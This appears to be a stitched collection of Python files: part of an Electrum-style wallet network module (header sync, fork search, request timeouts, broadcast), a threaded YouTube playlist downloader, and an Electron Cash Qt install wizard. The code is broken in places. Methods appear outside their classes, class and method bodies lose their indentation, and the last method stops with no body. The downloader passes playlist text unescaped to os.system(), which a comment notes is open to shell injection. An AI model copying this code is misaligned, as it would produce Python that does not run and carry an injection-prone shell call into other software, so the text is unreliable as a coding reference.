        elif interface.ping_required():
            # server.version doubles as the keep-alive ping.
            params = [ELECTRUM_VERSION, PROTOCOL_VERSION]
            self.queue_request('server.version', params, interface)
    now = time.time()
    # nodes: keep the pool of connected/connecting servers topped up.
    if len(self.interfaces) + len(self.connecting) < self.num_server:
        self.start_random_interface()
        if now - self.nodes_retry_time > NODES_RETRY_INTERVAL:
            # Periodically forgive previously-failed servers.
            self.print_error('network: retrying connections')
            self.disconnected_servers = set([])
            self.nodes_retry_time = now
    # main interface
    if not self.is_connected():
        if self.auto_connect:
            if not self.is_connecting():
                self.switch_to_random_interface()
        else:
            if self.default_server in self.disconnected_servers:
                if now - self.server_retry_time > SERVER_RETRY_INTERVAL:
                    self.disconnected_servers.remove(self.default_server)
                    self.server_retry_time = now
            else:
                self.switch_to_interface(self.default_server)
def request_chunk(self, interface, idx):
    """Ask `interface` for header chunk `idx`, recording the pending
    request index and its start time (used for timeout detection)."""
    message = "requesting chunk %d" % idx
    interface.print_error(message)
    self.queue_request('blockchain.block.get_chunk', [idx], interface)
    interface.request = idx
    interface.req_time = time.time()
def on_get_chunk(self, interface, response):
    '''Handle receiving a chunk of block headers'''
    error = response.get('error')
    result = response.get('result')
    params = response.get('params')
    if result is None or params is None or error is not None:
        interface.print_error(error or 'bad response')
        return
    # Ignore unsolicited chunks
    index = params[0]
    if interface.request != index:
        return
    connect = interface.blockchain.connect_chunk(index, result)
    # A chunk that doesn't connect means this server is useless to us.
    if not connect:
        self.connection_down(interface.server)
        return
    # If not finished, get the next chunk
    if interface.blockchain.height() < interface.tip:
        self.request_chunk(interface, index+1)
    else:
        # Caught up to the server tip: back to steady state.
        interface.request = None
        interface.mode = 'default'
        interface.print_error('catch up done', interface.blockchain.height())
        interface.blockchain.catch_up = None
    self.notify('updated')
def request_header(self, interface, height):
    """Ask `interface` for the single header at `height`, recording the
    pending request height and its start time."""
    #interface.print_error("requesting header %d" % height)
    self.queue_request('blockchain.block.get_header', [height], interface)
    interface.request = height
    interface.req_time = time.time()
def on_get_header(self, interface, response):
    '''Handle receiving a single block header.

    Drives the fork-location state machine via interface.mode:
      'backward' - walking back to find a height on a known chain
      'binary'   - binary search between known-good and known-bad heights
      'catch_up' - downloading headers forward to the server tip
      'default'  - steady state
    '''
    header = response.get('result')
    if not header:
        interface.print_error(response)
        self.connection_down(interface.server)
        return
    height = header.get('block_height')
    if interface.request != height:
        # Not the header we asked for: treat the server as misbehaving.
        interface.print_error("unsolicited header",interface.request, height)
        self.connection_down(interface.server)
        return
    chain = blockchain.check_header(header)
    if interface.mode == 'backward':
        if chain:
            # Found a header on a known chain: start binary search for
            # the exact fork point.
            interface.print_error("binary search")
            interface.mode = 'binary'
            interface.blockchain = chain
            interface.good = height
            next_height = (interface.bad + interface.good) // 2
        else:
            if height == 0:
                # Even genesis doesn't match: hopeless server.
                self.connection_down(interface.server)
                next_height = None
            else:
                # Keep doubling the step back from the tip.
                interface.bad = height
                interface.bad_header = header
                delta = interface.tip - height
                next_height = max(0, interface.tip - 2 * delta)
    elif interface.mode == 'binary':
        if chain:
            interface.good = height
            interface.blockchain = chain
        else:
            interface.bad = height
            interface.bad_header = header
        if interface.bad != interface.good + 1:
            # Narrow the [good, bad] window.
            next_height = (interface.bad + interface.good) // 2
        elif not interface.blockchain.can_connect(interface.bad_header, check_height=False):
            self.connection_down(interface.server)
            next_height = None
        else:
            # Fork point located at `bad`; decide how to handle it.
            branch = self.blockchains.get(interface.bad)
            if branch is not None:
                if branch.check_header(interface.bad_header):
                    interface.print_error('joining chain', interface.bad)
                    next_height = None
                elif branch.parent().check_header(header):
                    interface.print_error('reorg', interface.bad, interface.tip)
                    interface.blockchain = branch.parent()
                    next_height = None
                else:
                    # Conflicting fork at this checkpoint: reset the
                    # branch file and catch up along it.
                    interface.print_error('checkpoint conflicts with existing fork', branch.path())
                    branch.write('', 0)
                    branch.save_header(interface.bad_header)
                    interface.mode = 'catch_up'
                    interface.blockchain = branch
                    next_height = interface.bad + 1
                    interface.blockchain.catch_up = interface.server
            else:
                bh = interface.blockchain.height()
                next_height = None
                if bh > interface.good:
                    if not interface.blockchain.check_header(interface.bad_header):
                        # Genuine new fork: split off a child chain.
                        b = interface.blockchain.fork(interface.bad_header)
                        self.blockchains[interface.bad] = b
                        interface.blockchain = b
                        interface.print_error("new chain", b.checkpoint)
                        interface.mode = 'catch_up'
                        next_height = interface.bad + 1
                        interface.blockchain.catch_up = interface.server
                else:
                    assert bh == interface.good
                    if interface.blockchain.catch_up is None and bh < interface.tip:
                        interface.print_error("catching up from %d"% (bh + 1))
                        interface.mode = 'catch_up'
                        next_height = bh + 1
                        interface.blockchain.catch_up = interface.server
                self.notify('updated')
    elif interface.mode == 'catch_up':
        can_connect = interface.blockchain.can_connect(header)
        if can_connect:
            interface.blockchain.save_header(header)
            next_height = height + 1 if height < interface.tip else None
        else:
            # go back
            interface.print_error("cannot connect", height)
            interface.mode = 'backward'
            interface.bad = height
            interface.bad_header = header
            next_height = height - 1
        if next_height is None:
            # exit catch_up state
            interface.print_error('catch up done', interface.blockchain.height())
            interface.blockchain.catch_up = None
            self.switch_lagging_interface()
            self.notify('updated')
    elif interface.mode == 'default':
        # BUGFIX: this branch referenced an undefined name `ok`,
        # raising NameError whenever it ran.  Use the check_header()
        # result computed above: a header matching no known chain means
        # we must search backward for the fork point.
        if not chain:
            interface.print_error("default: cannot connect %d"% height)
            interface.mode = 'backward'
            interface.bad = height
            interface.bad_header = header
            next_height = height - 1
        else:
            interface.print_error("we are ok", height, interface.request)
            next_height = None
    else:
        raise BaseException(interface.mode)
    # If not finished, get the next header
    if next_height:
        # Far from the tip: fetch whole 2016-header chunks instead.
        if interface.mode == 'catch_up' and interface.tip > next_height + 50:
            self.request_chunk(interface, next_height // 2016)
        else:
            self.request_header(interface, next_height)
    else:
        interface.mode = 'default'
        interface.request = None
        self.notify('updated')
    # refresh network dialog
    self.notify('interfaces')
def maintain_requests(self):
    """Time out header/chunk requests pending for more than 20 seconds
    and drop the offending interface."""
    for interface in self.interfaces.values():
        # BUGFIX: the pending-request timestamp is stored as `req_time`
        # (see request_chunk/request_header); reading `request_time`
        # raised AttributeError whenever a request was outstanding.
        if interface.request and time.time() - interface.req_time > 20:
            interface.print_error("blockchain request timed out")
            self.connection_down(interface.server)
def wait_on_sockets(self):
    """Wait (up to 100ms) for interface sockets to become readable or
    writable, then send pending requests and process responses."""
    # Python docs say Windows doesn't like empty selects.
    # Sleep to prevent busy looping
    if not self.interfaces:
        time.sleep(0.1)
        return
    rin = [i for i in self.interfaces.values()]
    win = [i for i in self.interfaces.values() if i.num_requests()]
    try:
        rout, wout, xout = select.select(rin, win, [], 0.1)
    except socket.error as e:
        # BUGFIX/port: `except socket.error as (code, msg)` is
        # Python-2-only syntax; unpacking from e.args is identical
        # behaviour and also valid on Python 3.
        if e.args[0] == errno.EINTR:
            return
        raise
    assert not xout
    for interface in wout:
        interface.send_requests()
    for interface in rout:
        self.process_responses(interface)
def init_headers_file(self):
    """Ensure the block-headers file exists, bootstrapping it via a
    background download thread when necessary.

    self.downloading_headers stays True while the bootstrap runs; the
    run() loop waits on it before starting normal operation.
    """
    b = self.blockchains[0]
    if b.get_hash(0) == bitcoin.GENESIS:
        # Headers file already present and valid: nothing to do.
        self.downloading_headers = False
        return
    filename = b.path()
    def download_thread():
        # Best-effort bulk download of the headers file; on any failure
        # fall back to an empty file and let normal sync fill it in.
        try:
            import urllib, socket  # NOTE: urllib.urlretrieve is Python 2 only
            socket.setdefaulttimeout(30)
            self.print_error("downloading ", bitcoin.HEADERS_URL)
            urllib.urlretrieve(bitcoin.HEADERS_URL, filename + '.tmp')
            os.rename(filename + '.tmp', filename)
            self.print_error("done.")
        except Exception:
            self.print_error("download failed. creating file", filename)
            open(filename, 'wb+').close()
        b = self.blockchains[0]
        with b.lock: b.update_size()
        self.downloading_headers = False
    self.downloading_headers = True
    t = threading.Thread(target = download_thread)
    t.daemon = True
    t.start()
def run(self):
    """Network thread main loop: wait for the headers bootstrap, then
    service sockets, requests and pending sends until stopped."""
    self.init_headers_file()
    # Block until the background headers download (if any) completes.
    while self.is_running() and self.downloading_headers:
        time.sleep(1)
    while self.is_running():
        self.maintain_sockets()
        self.wait_on_sockets()
        self.maintain_requests()
        self.run_jobs() # Synchronizer and Verifier
        self.process_pending_sends()
    # Shutdown requested: tear everything down.
    self.stop_network()
    self.on_stop()
def on_notify_header(self, interface, header):
    """Handle a new tip header announced by `interface` through the
    blockchain.headers.subscribe subscription."""
    height = header.get('block_height')
    if not height:
        return
    interface.tip_header = header
    interface.tip = height
    if interface.mode != 'default':
        # A fork-location state machine is already running on this
        # interface; it will pick the new tip up by itself.
        return
    b = blockchain.check_header(header)
    if b:
        # Header already known on some chain.
        interface.blockchain = b
        self.switch_lagging_interface()
        self.notify('interfaces')
        return
    b = blockchain.can_connect(header)
    if b:
        # Header extends a known chain: save it.
        interface.blockchain = b
        b.save_header(header)
        self.switch_lagging_interface()
        self.notify('updated')
        self.notify('interfaces')
        return
    tip = max([x.height() for x in self.blockchains.values()])
    if tip >=0:
        # Unknown header: search backward for a common ancestor.
        interface.mode = 'backward'
        interface.bad = height
        interface.bad_header = header
        self.request_header(interface, min(tip, height - 1))
    else:
        chain = self.blockchains[0]
        if chain.catch_up is None:
            # BUGFIX: catch_up is compared against server strings in
            # connection_down() and on_get_header(); storing the
            # interface object here meant those comparisons never
            # matched, so catch_up was never cleared on disconnect.
            chain.catch_up = interface.server
            interface.mode = 'catch_up'
            interface.blockchain = chain
            self.request_header(interface, 0)
def blockchain(self):
    """Return the Blockchain we currently follow, tracking the active
    interface's chain (by checkpoint) whenever one is available."""
    iface = self.interface
    if iface and iface.blockchain is not None:
        self.blockchain_index = iface.blockchain.checkpoint
    return self.blockchains[self.blockchain_index]
def get_blockchains(self):
    """Map blockchain checkpoint key -> list of interfaces following
    that chain; chains followed by no interface are omitted."""
    out = {}
    for k, b in self.blockchains.items():
        # BUGFIX/port: was `filter(...)`; under Python 3 a filter
        # object is always truthy (so empty chains were included) and
        # callers would receive a one-shot iterator.  A list
        # comprehension keeps the Python 2 behaviour everywhere.
        followers = [i for i in self.interfaces.values() if i.blockchain == b]
        if followers:
            out[k] = followers
    return out
def follow_chain(self, index):
    """Make chain `index` (a checkpoint key in self.blockchains) the
    followed chain, persist the choice, and switch to an interface
    that serves it.

    Raises BaseException when the index is unknown.
    """
    blockchain = self.blockchains.get(index)
    if blockchain:
        self.blockchain_index = index
        self.config.set_key('blockchain_index', index)
        # Prefer an already-connected interface on that chain.
        for i in self.interfaces.values():
            if i.blockchain == blockchain:
                self.switch_to_interface(i.server)
                break
    else:
        raise BaseException('blockchain not found', index)
    if self.interface:
        # Re-apply parameters so the default server tracks the new
        # interface (server strings are 'host:port:protocol').
        server = self.interface.server
        host, port, protocol, proxy, auto_connect = self.get_parameters()
        host, port, protocol = server.split(':')
        self.set_parameters(host, port, protocol, proxy, auto_connect)
def get_local_height(self):
    """Return the height of the chain we currently follow."""
    chain = self.blockchain()
    return chain.height()
def synchronous_get(self, request, timeout=30):
    """Send one (method, params) request and block until its response
    arrives or `timeout` seconds elapse.

    Returns the response's result; raises BaseException on timeout or
    when the server returned an error.
    """
    queue = Queue.Queue()  # NOTE: Python 2 stdlib queue module
    # The queue's put() doubles as the response callback.
    self.send([request], queue.put)
    try:
        r = queue.get(True, timeout)
    except Queue.Empty:
        raise BaseException('Server did not answer')
    if r.get('error'):
        raise BaseException(r.get('error'))
    return r.get('result')
def broadcast(self, tx, timeout=30):
    """Broadcast transaction `tx` to the network.

    Returns (True, txid) on success, or (False, "error: ...") when the
    request failed or the server echoed back an unexpected value.
    """
    tx_hash = tx.txid()
    request = ('blockchain.transaction.broadcast', [str(tx)])
    try:
        out = self.synchronous_get(request, timeout)
    except BaseException as e:
        # synchronous_get signals timeouts/server errors this way.
        return False, "error: " + str(e)
    if out != tx_hash:
        return False, "error: " + out
    return True, out
|
multi-threads-DLVideo.py
|
# Python program to illustrate the concept
# of threading
# importing the threading module
import threading
import youtube_dl
import sys
import os
def task(string, index=None):
    """Download one YouTube video given its id.

    string -- the video id, possibly with a trailing newline
    index  -- optional 1-based position used for the progress line.
              BUGFIX: the original printed the module-level `count`,
              which by the time the threads run always holds the final
              line count, so every thread reported the same number.
              Pass `index` to get a correct per-file label; when omitted
              the old behaviour (global `count`) is preserved.
    """
    video_id = string.strip()
    label = count if index is None else index
    print("downloading file {}: {}".format(label, video_id))
    # NOTE(review): relies on OS file association / executable bit for
    # videoYoutubeDL.py; os.system() on interpolated text is shell
    # injection-prone if the playlist file is untrusted.
    stringCommand = "videoYoutubeDL.py https://www.youtube.com/watch?v=" + video_id
    print(stringCommand)
    os.system(stringCommand)
if __name__ == "__main__":
    print("Usage:")
    print("python downloadPlayListYouTubeAudio.py playlist.txt")
    print("A file called playlist.txt needed, to create this file, call playListYouTube.py")
    print("Enjoy!")
    filenames = sys.argv[1]
    # Read the playlist, skipping blank lines.  BUGFIX: the original
    # loop appended the terminating empty read (and counted it), so one
    # extra thread was spawned that tried to download an empty video
    # id.  The file is now also closed via a context manager.
    with open(filenames, 'r') as file1:
        fileName = [line for line in file1 if line.strip()]
    count = len(fileName)  # kept module-level: task() reads it
    # One thread per video; start them all, then wait for completion.
    # NOTE(review): thread count is unbounded (one per playlist line).
    t1 = []
    for line in fileName:
        t = threading.Thread(target=task, args=(line,))
        t1.append(t)
    for t in t1:
        t.start()
    for t in t1:
        t.join()
    # all download threads completely executed
    print("Done!")
|
installwizard.py
|
# -*- mode: python3 -*-
import os
import sys
import threading
import traceback
import weakref
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electroncash import Wallet, WalletStorage
from electroncash.util import UserCancelled, InvalidPassword, finalization_print_error
from electroncash.base_wizard import BaseWizard
from electroncash.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PW_NEW
from .bip38_importer import Bip38Importer
class GoBack(Exception):
    """Raised by wizard dialogs when the user presses the Back button."""
    pass
# User-visible wizard strings, wrapped in _() for translation.
MSG_GENERATING_WAIT = _("Electron Cash is generating your addresses, please wait...")
MSG_ENTER_ANYTHING = _("Please enter a seed phrase, a master key, a list of "
                       "Bitcoin addresses, or a list of private keys")
MSG_ENTER_SEED_OR_MPK = _("Please enter a seed phrase or a master key (xpub or xprv):")
MSG_COSIGNER = _("Please enter the master public key of cosigner #{}:")
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
                     + _("Leave this field empty if you want to disable encryption.")
MSG_RESTORE_PASSPHRASE = \
    _("Please enter your seed derivation passphrase. "
      "Note: this is NOT your encryption password. "
      "Leave this field empty if you did not use one or are unsure.")
class CosignWidget(QWidget):
    """Pie-chart widget visualising an m-of-n multisig setup: n equal
    slices, of which the first m are drawn green (required signers)."""
    # Fixed pixel size of the (square) pie chart.
    size = 120
    def __init__(self, m, n):
        QWidget.__init__(self)
        self.R = QRect(0, 0, self.size, self.size)
        self.setGeometry(self.R)
        self.setMinimumHeight(self.size)
        self.setMaximumHeight(self.size)
        self.m = m
        self.n = n
    def set_n(self, n):
        # Update the total number of cosigners and repaint.
        self.n = n
        self.update()
    def set_m(self, m):
        # Update the number of required signatures and repaint.
        self.m = m
        self.update()
    def paintEvent(self, event):
        bgcolor = self.palette().color(QPalette.Background)
        pen = QPen(bgcolor, 7, Qt.SolidLine)
        qp = QPainter()
        qp.begin(self)
        qp.setPen(pen)
        qp.setRenderHint(QPainter.Antialiasing)
        qp.setBrush(Qt.gray)
        # Qt pie angles are in 1/16ths of a degree; draw n equal slices.
        for i in range(self.n):
            alpha = int(16* 360 * i/self.n)
            alpha2 = int(16* 360 * 1/self.n)
            qp.setBrush(Qt.green if i<self.m else Qt.gray)
            qp.drawPie(self.R, alpha, alpha2)
        qp.end()
def wizard_dialog(func):
    """Decorator for InstallWizard dialog methods.

    Updates the Back/Cancel button label, runs the dialog body, maps
    GoBack to back-navigation (or closing when at the first page),
    swallows UserCancelled, and finally feeds the dialog's result into
    the `run_next` continuation supplied via kwargs.
    """
    from functools import wraps

    @wraps(func)  # preserve the wrapped dialog's name and docstring
    def func_wrapper(*args, **kwargs):
        run_next = kwargs['run_next']
        wizard = args[0]
        wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
        try:
            out = func(*args, **kwargs)
        except GoBack:
            wizard.go_back() if wizard.can_go_back() else wizard.close()
            return
        except UserCancelled:
            return
        # Normalise a single return value to a 1-tuple for run_next.
        if type(out) is not tuple:
            out = (out,)
        run_next(*out)
    return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage):
    """Build the wizard window: title and page content inside a scroll
    pane, logo column on the left, Back/Next buttons at the bottom,
    and a local event loop used by exec_layout() to block on input."""
    BaseWizard.__init__(self, config, storage)
    QDialog.__init__(self, None)
    self.setWindowTitle('Electron Cash - ' + _('Install Wizard'))
    self.app = app
    self.config = config
    # Set for base base class
    self.plugins = plugins
    self.setMinimumSize(600, 400)
    self.accept_signal.connect(self.accept)
    self.title = QLabel()
    self.main_widget = QWidget()
    self.back_button = QPushButton(_("Back"), self)
    self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
    self.next_button = QPushButton(_("Next"), self)
    self.next_button.setDefault(True)
    self.logo = QLabel()
    self.please_wait = QLabel(_("Please wait..."))
    self.please_wait.setAlignment(Qt.AlignCenter)
    self.icon_filename = None
    # Local event loop: exit code 0 = cancel, 1 = back, 2 = next.
    self.loop = QEventLoop()
    self.rejected.connect(lambda: self.loop.exit(0))
    self.back_button.clicked.connect(lambda: self.loop.exit(1))
    self.next_button.clicked.connect(lambda: self.loop.exit(2))
    outer_vbox = QVBoxLayout(self)
    inner_vbox = QVBoxLayout()
    inner_vbox.addWidget(self.title)
    inner_vbox.addWidget(self.main_widget)
    inner_vbox.addStretch(1)
    inner_vbox.addWidget(self.please_wait)
    inner_vbox.addStretch(1)
    # Wrap the page content in a scroll area so small screens work.
    scroll_widget = QWidget()
    scroll_widget.setLayout(inner_vbox)
    scroll = QScrollArea()
    scroll.setWidget(scroll_widget)
    scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
    scroll.setWidgetResizable(True)
    icon_vbox = QVBoxLayout()
    icon_vbox.addWidget(self.logo)
    icon_vbox.addStretch(1)
    hbox = QHBoxLayout()
    hbox.addLayout(icon_vbox)
    hbox.addSpacing(5)
    hbox.addWidget(scroll)
    hbox.setStretchFactor(scroll, 1)
    outer_vbox.addLayout(hbox)
    outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
    self.set_icon(':icons/electron-cash.svg')
    self.show()
    self.raise_()
    # Track object lifecycle
    finalization_print_error(self)
def run_and_get_wallet(self):
    """First wizard page: pick a wallet file (prompting for a password
    when the file is encrypted), handle storage split/upgrade
    migrations, and return (wallet, password).

    Returns None when the user cancels at any point.
    """
    vbox = QVBoxLayout()
    hbox = QHBoxLayout()
    hbox.addWidget(QLabel(_('Wallet') + ':'))
    self.name_e = QLineEdit()
    hbox.addWidget(self.name_e)
    button = QPushButton(_('Choose...'))
    hbox.addWidget(button)
    vbox.addLayout(hbox)
    self.msg_label = QLabel('')
    vbox.addWidget(self.msg_label)
    hbox2 = QHBoxLayout()
    self.pw_e = QLineEdit('', self)
    self.pw_e.setFixedWidth(150)
    self.pw_e.setEchoMode(2)  # password echo mode
    self.pw_label = QLabel(_('Password') + ':')
    hbox2.addWidget(self.pw_label)
    hbox2.addWidget(self.pw_e)
    hbox2.addStretch()
    vbox.addLayout(hbox2)
    self.set_layout(vbox, title=_('Electron Cash wallet'))
    wallet_folder = os.path.dirname(self.storage.path)
    def on_choose():
        # File-picker for an existing wallet file.
        path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
        if path:
            self.name_e.setText(path)
    def on_filename(filename):
        # Re-evaluate the chosen path: readable? exists? encrypted?
        path = os.path.join(wallet_folder, filename)
        try:
            self.storage = WalletStorage(path, manual_upgrades=True)
            self.next_button.setEnabled(True)
        except IOError:
            self.storage = None
            self.next_button.setEnabled(False)
        if self.storage:
            if not self.storage.file_exists():
                msg =_("This file does not exist.") + '\n' \
                      + _("Press 'Next' to create this wallet, or choose another file.")
                pw = False
            elif self.storage.file_exists() and self.storage.is_encrypted():
                msg = _("This file is encrypted.") + '\n' + _('Enter your password or choose another file.')
                pw = True
            else:
                msg = _("Press 'Next' to open this wallet.")
                pw = False
        else:
            msg = _('Cannot read file')
            pw = False
        self.msg_label.setText(msg)
        # Only show the password row for encrypted wallets.
        if pw:
            self.pw_label.show()
            self.pw_e.show()
            self.pw_e.setFocus()
        else:
            self.pw_label.hide()
            self.pw_e.hide()
    button.clicked.connect(on_choose)
    self.name_e.textChanged.connect(on_filename)
    n = os.path.basename(self.storage.path)
    self.name_e.setText(n)
    # Loop until we have a usable (possibly decrypted) storage, or the
    # user cancels/goes back.
    while True:
        password = None
        if self.storage.file_exists() and not self.storage.is_encrypted():
            break
        if self.loop.exec_() != 2:  # 2 = next
            return
        if not self.storage.file_exists():
            break
        if self.storage.file_exists() and self.storage.is_encrypted():
            password = self.pw_e.text()
            try:
                self.storage.decrypt(password)
                break
            except InvalidPassword as e:
                # Wrong password: tell the user and stay on this page.
                QMessageBox.information(None, _('Error'), str(e))
                continue
            except BaseException as e:
                traceback.print_exc(file=sys.stdout)
                QMessageBox.information(None, _('Error'), str(e))
                return
    path = self.storage.path
    if self.storage.requires_split():
        # Legacy multi-account wallet: offer to split into files.
        self.hide()
        msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
                "Do you want to split your wallet into multiple files?").format(path)
        if not self.question(msg):
            return
        file_list = '\n'.join(self.storage.split_accounts())
        msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
        if self.question(msg):
            os.remove(path)
            self.show_warning(_('The file was removed'))
        return
    if self.storage.requires_upgrade():
        # One-way storage format upgrade.
        self.hide()
        msg = _("The format of your wallet '%s' must be upgraded for Electron Cash. This change will not be backward compatible"%path)
        if not self.question(msg):
            return
        self.storage.upgrade()
        self.wallet = Wallet(self.storage)
        return self.wallet, password
    action = self.storage.get_action()
    if action and action != 'new':
        # Wallet creation was interrupted earlier: offer to resume.
        self.hide()
        msg = _("The file '{}' contains an incompletely created wallet.\n"
                "Do you want to complete its creation now?").format(path)
        if not self.question(msg):
            if self.question(_("Do you want to delete '{}'?").format(path)):
                os.remove(path)
                self.show_warning(_('The file was removed'))
            return
        self.show()
    if action:
        # self.wallet is set in run
        self.run(action)
        return self.wallet, password
    self.wallet = Wallet(self.storage)
    return self.wallet, password
def finished(self):
    """Called in hardware client wrapper, in order to close popups.

    The install wizard has no popups to dismiss, so this is a no-op.
    """
    return None
def on_error(self, exc_info):
    # Show unexpected exceptions to the user; UserCancelled simply
    # means the user backed out and is silently ignored.
    if not isinstance(exc_info[1], UserCancelled):
        traceback.print_exception(*exc_info)
        self.show_error(str(exc_info[1]))
def set_icon(self, filename):
    """Display `filename` as the wizard's side logo; return the
    previously shown icon's filename so callers can restore it."""
    prior_filename, self.icon_filename = self.icon_filename, filename
    self.logo.setPixmap(QIcon(filename).pixmap(60))
    return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
    """Install `layout` as the wizard's current page content."""
    self.title.setText("<b>%s</b>"%title if title else "")
    self.title.setVisible(bool(title))
    # Get rid of any prior layout by assigning it to a temporary widget
    prior_layout = self.main_widget.layout()
    if prior_layout:
        QWidget().setLayout(prior_layout)
    self.main_widget.setLayout(layout)
    self.back_button.setEnabled(True)
    self.next_button.setEnabled(next_enabled)
    if next_enabled:
        self.next_button.setFocus()
    # Show the page, hide the "please wait" placeholder.
    self.main_widget.setVisible(True)
    self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
                next_enabled=True):
    """Show `layout` and block in the local event loop until the user
    acts: Next returns 2, Back raises GoBack, cancel raises
    UserCancelled (unless raise_on_cancel is False)."""
    self.set_layout(layout, title, next_enabled)
    result = self.loop.exec_()
    if not result and raise_on_cancel:
        raise UserCancelled
    if result == 1:
        raise GoBack
    # Swap the page for the "please wait" placeholder until the next
    # set_layout() call replaces it.
    self.title.setVisible(False)
    self.back_button.setEnabled(False)
    self.next_button.setEnabled(False)
    self.main_widget.setVisible(False)
    self.please_wait.setVisible(True)
    self.refresh_gui()
    return result
def refresh_gui(self):
    # For some reason, to refresh the GUI this needs to be called twice
    for _pass in range(2):
        self.app.processEvents()
def remove_from_recently_open(self, filename):
    """Drop `filename` from the recently-opened-wallets list kept in
    the user config."""
    self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
    """Show a free-form keys/text entry page; Next stays disabled until
    `is_valid` accepts the text.  Returns the entered text."""
    slayout = KeysLayout(parent=self, title=message, is_valid=is_valid,
                         allow_multi=allow_multi)
    self.exec_layout(slayout, title, next_enabled=False)
    return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
    """Show a seed-entry page; returns (seed, is_bip39, is_ext)."""
    slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self, editable=True)
    self.exec_layout(slayout, title, next_enabled=False)
    return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
def bip38_prompt_for_pw(self, bip38_keys):
    ''' Reimplemented from basewizard superclass. Expected to return the pw
    dict or None. '''
    d = Bip38Importer(bip38_keys, parent=self.top_level_window())
    # The dialog's exec_ result is unused; the outcome is conveyed via
    # decoded_keys below.
    res = d.exec_()
    d.setParent(None)  # python GC quicker if this happens
    return d.decoded_keys  # dict will be empty if user cancelled
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False):
    """Dialog asking for a master key (or several, if allow_multi)."""
    return self.text_input(title, message, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
    """Dialog asking for cosigner #`index`'s master key."""
    title = _("Add Cosigner") + " %d"%index
    message = ' '.join([
        _('Please enter the master public key (xpub) of your cosigner.'),
        _('Enter their master private key (xprv) if you want to be able to sign for them.')
    ])
    return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
    """Prompt for a seed phrase to restore a wallet; returns the
    (seed, is_bip39, is_ext) triple from seed_input()."""
    # Enable the optional features the wizard allows for this flow.
    options = [name for name, enabled in (('ext', self.opt_ext),
                                          ('bip39', self.opt_bip39)) if enabled]
    title = _('Enter Seed')
    message = _('Please enter your seed phrase in order to restore your wallet.')
    return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
    """Ask the user to re-type the freshly generated seed."""
    # Clear the clipboard so the seed cannot simply be pasted back.
    self.app.clipboard().clear()
    title = _('Confirm Seed')
    message = ' '.join([
        _('Your seed is important!'),
        _('If you lose your seed, your money will be permanently lost.'),
        _('To make sure that you have properly saved your seed, please retype it here.')
    ])
    seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
    return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text, editable=True):
    """Display the generated seed (read-only); returns whether the
    user enabled the seed-extension ('ext') option."""
    title = _("Your wallet generation seed is:")
    slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'], editable=False)
    self.exec_layout(slayout)
    return slayout.is_ext
def pw_layout(self, msg, kind):
    """Run a password-entry layout; returns (new_password, encrypt?).

    Encryption defaults to checked.
    """
    playout = PasswordLayout(None, msg, kind, self.next_button)
    playout.encrypt_cb.setChecked(True)
    self.exec_layout(playout.layout())
    return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next):
    """Request the user enter a new password and confirm it. Return
    the password or None for no password. Note that this dialog screen
    cannot go back, and instead the user can only cancel."""
    return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW)
def _add_extra_button_to_layout(self, extra_button, layout):
    """Append an optional right-aligned action button to `layout`.

    `extra_button` must be a (title, callback) pair; anything else is
    silently ignored.
    """
    if not (isinstance(extra_button, (list, tuple)) and len(extra_button) == 2):
        return
    but_title, but_action = extra_button
    row = QHBoxLayout()
    row.setContentsMargins(12,24,12,12)
    but = QPushButton(but_title)
    row.addStretch(1)
    row.addWidget(but)
    layout.addLayout(row)
    but.clicked.connect(but_action)
@wizard_dialog
def confirm_dialog(self, title, message, run_next, extra_button=None):
    """Simple confirmation page built on confirm()."""
    self.confirm(message, title, extra_button=extra_button)
def confirm(self, message, title, extra_button=None):
    """Show `message` with selectable/clickable text and wait for the
    user to press Next."""
    label = WWLabel(message)
    # Allow selecting the text and activating links by mouse/keyboard.
    textInteractionFlags = (Qt.LinksAccessibleByMouse
                            | Qt.TextSelectableByMouse
                            | Qt.TextSelectableByKeyboard
                            | Qt.LinksAccessibleByKeyboard)
    label.setTextInteractionFlags(textInteractionFlags)
    label.setOpenExternalLinks(True)
    vbox = QVBoxLayout()
    vbox.addWidget(label)
    if extra_button:
        self._add_extra_button_to_layout(extra_button, vbox)
    self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
    """Run a BaseWizard action as a wizard step."""
    self.run(action)
def terminate(self):
self.accept_signal.emit()
    def waiting_dialog(self, task, msg):
        """Show the generating-wait text, run *task* on a worker thread, and
        block until it completes."""
        # NOTE(review): *msg* is ignored; the fixed MSG_GENERATING_WAIT text is
        # shown instead -- confirm whether this is intentional.
